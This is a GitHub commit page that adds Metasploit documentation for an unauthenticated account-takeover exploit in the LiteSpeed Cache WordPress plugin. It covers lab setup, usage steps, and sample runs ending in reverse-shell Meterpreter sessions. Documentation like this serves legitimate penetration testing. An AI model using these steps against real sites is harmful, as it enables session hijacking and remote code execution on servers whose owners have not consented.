forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
dd5dd54
commit c80a03f
Showing
2 changed files
with
215 additions
and
82 deletions.
There are no files selected for viewing
112 changes: 112 additions & 0 deletions
112
documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,112 @@ | ||
## Vulnerable Application | ||
This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin that currently | ||
has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging | ||
feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible | ||
without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies | ||
found in the debug.log can be used to upload and execute a malicious plugin containing a payload. | ||
|
||
### Setup | ||
Spin up a WordPress container with the following docker-compose file: | ||
```yml | ||
version: '3.8' | ||
|
||
services: | ||
db: | ||
image: mysql:latest | ||
volumes: | ||
- db_data:/var/lib/mysql | ||
restart: always | ||
environment: | ||
MYSQL_ROOT_PASSWORD: example_root_password | ||
MYSQL_DATABASE: wordpress | ||
MYSQL_USER: wordpress_user | ||
MYSQL_PASSWORD: example_password | ||
|
||
wordpress: | ||
depends_on: | ||
- db | ||
image: wordpress:latest | ||
ports: | ||
- "8000:80" # You can change the port as per your preference | ||
restart: always | ||
environment: | ||
WORDPRESS_DB_HOST: db:3306 | ||
WORDPRESS_DB_USER: wordpress_user | ||
WORDPRESS_DB_PASSWORD: example_password | ||
WORDPRESS_DB_NAME: wordpress | ||
volumes: | ||
- wordpress_data:/var/www/html | ||
|
||
volumes: | ||
db_data: | ||
wordpress_data: | ||
``` | ||
Download, install and activate the vulnerable LiteSpeed Cache plugin: https://downloads.wordpress.org/plugin/litespeed-cache.6.3.zip | ||
Once installed a LiteSpeed menu bar item should appear on the left hand side of the application. When clicked a drop down | ||
should appear. Select "ToolBox", then select "Debug Settings". Then switch the "Debug Log" feature to "On". | ||
Sign out of WordPress and when you reauthenticate your admin cookie will be logged to /wp-content/debug.log | ||
## Verification Steps | ||
1. Start msfconsole | ||
1. Do: `use multi/http/wp_litespeed_cookie_theft` | ||
1. Set the `RHOST`, `LHOST` and `RPORT` | ||
1. Run the module | ||
1. Receive a Meterpreter session in the context of the user running the WordPress site. | ||
|
||
## Scenarios | ||
### ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3 | ||
``` | ||
msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit | ||
[*] Reloading module... | ||
|
||
[*] Started reverse TCP handler on 192.168.1.67:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] One or more potential admin cookies were found | ||
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload | ||
[*] Preparing payload... | ||
[*] Uploading payload... | ||
[*] Executing the payload at /wp-content/plugins/qSNzhabMTP/OiDynMUetY.php... | ||
[*] Sending stage (39927 bytes) to 192.168.1.67 | ||
[+] Deleted OiDynMUetY.php | ||
[+] Deleted qSNzhabMTP.php | ||
[+] Deleted ../qSNzhabMTP | ||
[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.67:64935) at 2024-09-11 23:18:14 -0700 | ||
|
||
meterpreter > getuid | ||
Server username: www-data | ||
meterpreter > sysinfo | ||
Computer : 29292f368fe3 | ||
OS : Linux 29292f368fe3 6.10.4-linuxkit #1 SMP PREEMPT_DYNAMIC Mon Aug 12 08:48:58 UTC 2024 x86_64 | ||
Meterpreter : php/linux | ||
``` | ||
### ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3 | ||
``` | ||
msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit | ||
[*] Reloading module... | ||
|
||
[*] Started reverse TCP handler on 192.168.1.67:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] One or more potential admin cookies were found | ||
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload | ||
[*] Preparing payload... | ||
[*] Uploading payload... | ||
[*] Executing the payload at /wp-content/plugins/IVStOPtwuq/WvXecICkgw.php... | ||
[*] Sending stage (3045380 bytes) to 192.168.1.67 | ||
[+] Deleted WvXecICkgw.php | ||
[+] Deleted IVStOPtwuq.php | ||
[+] Deleted ../IVStOPtwuq | ||
[*] Meterpreter session 6 opened (192.168.1.67:4444 -> 192.168.1.67:64884) at 2024-09-11 23:14:49 -0700 | ||
|
||
meterpreter > getuid | ||
Server username: www-data | ||
meterpreter > sysinfo | ||
Computer : 172.22.0.3 | ||
OS : Debian 12.5 (Linux 6.10.4-linuxkit) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters